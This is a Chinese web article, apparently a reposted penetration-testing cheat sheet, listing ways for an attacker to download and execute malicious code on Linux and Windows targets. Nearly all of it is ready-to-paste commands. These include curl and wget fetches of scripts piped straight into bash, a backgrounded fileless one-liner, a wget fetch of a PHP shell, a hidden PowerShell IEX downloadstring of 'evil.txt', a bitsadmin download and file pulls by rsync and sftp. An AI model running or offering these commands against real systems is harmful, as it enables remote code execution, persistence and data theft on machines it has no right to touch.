经过命令下载执行恶意代码的几种姿势
发布时间:2022-07-29 10:24:12 所属栏目:安全 来源:互联网
导读:在渗透过程中,攻击者往往需要通过命令下载执行恶意代码,实现信息收集、持久化、权限提升、防御绕过、提取凭证、横向移动、数据渗出等操作。 在目标主机执行恶意代码,可以分为上传/下载并执行恶意代码和无文件远程恶意代码执行。接下来,我们来总结一下Lin
在渗透过程中,攻击者往往需要通过命令下载执行恶意代码,实现信息收集、持久化、权限提升、防御绕过、提取凭证、横向移动、数据渗出等操作。 在目标主机执行恶意代码,可以分为上传/下载并执行恶意代码和无文件远程恶意代码执行。接下来,我们来总结一下Linux和Windows中下载和执行恶意代码的一些姿势。 一、Linux 远程恶意代码执行 01、curl 以用curl的方式执行http页面上的shell脚本,无需download,在本地机器上直接执行。 复制 方式1:curl -fsSL http://192.168.99.19:8080/test.sh | bash 方式2:bash < <( curl http://192.168.99.19:8080/test.sh ) 02、wget 执行wget命令远程下载恶意程序。 复制 方式1:wget -q -O- http://192.168.99.19:8080/test.sh | bash 方式2:wget http://192.168.99.19:8080/shell.txt -O /tmp/x.php && php /tmp/x.php curl+wget合并,实现无文件远程恶意代码执行。 复制 bash -c '(curl -fsSL http://192.168.99.19:8080/test.sh|| wget -q -O- http://192.168.99.19:8080/test.sh)|bash -sh >/dev/null 2>&1&' 03、rcp rcp命令用于复制远程文件或目录。 复制 rcp root@x.x.x.x:./testfile testfile 1. 04、scp scp 是 rcp 的加强版,scp 是加密的,rcp 是不加密的。 复制 scp username@servername:/path/filename /tmp/local_destination 1. 05、rsync 使用rsync可以进行远程同步,拉取文件到本地服务器。 复制 rsync -av x.x.x.x:/tmp/passwd.txt /tmp/passwd.txt 1. 06、sftp 使用sftp下载远程服务器上的文件。 复制 sftp admin@192.168.99.242 <<EOF get /tmp/2.txt quit EOF 二、Windows 远程恶意代码执行 利用powershell远程执行ps1脚本。 复制 powershell -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://192.168.28.128/evil.txt'))" 利用bitsadmin命令下载文件到目标机器。 复制 bitsadmin /transfer n http://192.168.28.128/imag/evil.txt d:test1.txt (编辑:PHP编程网 - 黄冈站长网) 【声明】本站内容均来自网络,其相关言论仅代表作者个人观点,不代表本站立场。若无意侵犯到您的权利,请及时与联系站长删除相关内容! |